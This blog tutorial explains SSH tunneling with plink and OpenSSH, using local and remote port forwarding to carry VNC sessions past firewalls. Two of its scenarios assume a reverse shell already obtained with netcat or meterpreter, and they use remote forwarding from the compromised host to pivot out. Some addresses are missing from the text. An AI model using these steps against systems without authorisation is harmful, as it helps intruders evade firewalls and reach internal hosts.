SSH Tunneling

What is SSH ?

SSH stands for “Secure Shell”, It used to create a secure connection between two computers.

SSH supplies a command line interface for remote administration/management of Linux based systems or even CISCO routers, It allows us to securely perform various maintenance tasks and more…basically we can think of it as “secured telnet”.

SSH communication consists of a SSH Server and a SSH Client.

So what SSH Tunneling is ?

We can use SSH to create an encrypted communication channel to tunnel unencrypted traffic trough (for example POP3 ).SSH also supports port forwarding which enables ssh to pass incoming traffic to specified hosts and ports.In this tutorial we will take a look at various scenarios and uses for SSH.

Scenario 1:

Host A – SSH Client  (PLINK running on  Windows XP)

Host B – SSH Sevrer  (OpenSSH running on linux)

Host C – Destination (VNC Server installed on a Windows XP system)

In this scenario Host A has access to Host B via SSH which requires a valid username and password for the connection.

Host A is behind a firewall which blocks outgoing vnc connections on port 5900 and wants to connect via VNC to Host C.

Let’s  tunnel out our vnc sessions via ssh by initiating the following command on Host A:

C:\>plink.exe [Host B] -P 22 -C -L[Host C]:5900 -l username -pw password
-P = SSH server port
-C = enable compression
-L = Forward local port to remote address
-l = ssh server login name
-pw = ssh server password

We connected to our ssh server via port 22 and a tunnel has been created.

Using the netstat command you will notice your loopback interface ( is now listening on port 53 (which is the start of the tunnel).

C:\>netstat -an | FIND "53"
TCP               LISTENING

When we open our vnc client and connect to data will be sent through our tunnel and will be forwarded to port 5900 (which is the end of our tunnel).

If you are using linux SSH instead of PLINK you can use the following command:

exploit ~ # ssh -L 53:[Host C]:5900 [Host B]

Scenario 2:

Host A – SSH Server (OpenSSH running on linux)

Host B – SSH Client (PLINK running on  Windows XP)

In this scenario Host A wants to connect to Host B using vnc .

Host B is located behind a firewall/router with no vnc ports opened

It does have vnc server installed and listening locally on port 5900.

for this scenario we should have previously gained a reverse shell using netcat or meterpreter.

We will initiate the following command from our shell on Host B

C:\>plink -P 22 -l username -pw password -C -R 5900: [Host A]
-P = SSH server port
-l = ssh server login name
-pw = ssh server password
-C = enable compression
-R = Forward remote port to local address

All we have to do now is to open our vnc client on Host A and connect to :

And viola we have a vnc session to Host B.

Scenario 3:

Host A – SSH Server (OpenSSH with remote port forwarding enabled running on linux)

Host B – SSH Client (PLINK running on  Windows XP)

Host C – Destination (VNC Server installed on a Windows XP system)

This scenario is similar to scenario 2 with the exception of a third host involved.

Again, we have gained a reverse shell on Host B and we will use Host B to tunnel and forward traffic to Host C vnc server using the following command:

C:\>plink.exe [Host A] -P 22 -C -R[Host C]:5900 -l username -pw password
-P = SSH server port
-C = enable compression
-R = Forward remote port to local address
-l = ssh server login name
-pw = ssh server password

Once again open your vnc client and make a connection to :


In case ssh default port (22) is blocked you can use another port by changing it settings in the sshd_config file in BackTrack.

Just uncomment the port line (#Port 22) and change it to the port you wish to use

in PLINK you can specify ssh server port with the “-P” option.

exploit ~ # nano/etc/ssh/sshd_config
# $OpenBSD: sshd_config,v 1.74 2006/07/19 13:07:10 dtucker Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.
# This sshd was compiled with PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options change a
# default value.

#Port 22
#Protocol 2,1
#AddressFamily any
#ListenAddress ::

Tools used in this tutorial:


Plink is a command-line interface to the PuTTY (the Telnet and SSH client itself)  back ends.


PuTTY is a terminal emulator application which can act as a client for the SSH, Telnet, rlogin, and raw TCP computing protocols.


OpenSSH is a FREE version of the SSH connectivity tools that technical users of the Internet rely on. Users of telnet, rlogin, and ftp may not realize that their password is transmitted across the Internet unencrypted, but it is. OpenSSH encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other attacks. Additionally, OpenSSH provides secure tunneling capabilities and several authentication methods, and supports all SSH protocol versions.


BackTrack is the most top rated linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-Rom and is fully accessible within minutes.

Post to Twitter


  1. […] SSH Tunneling […]

  2. […] More information about SSH Tunneling can be found Here […]

Leave a Reply


Recent Posts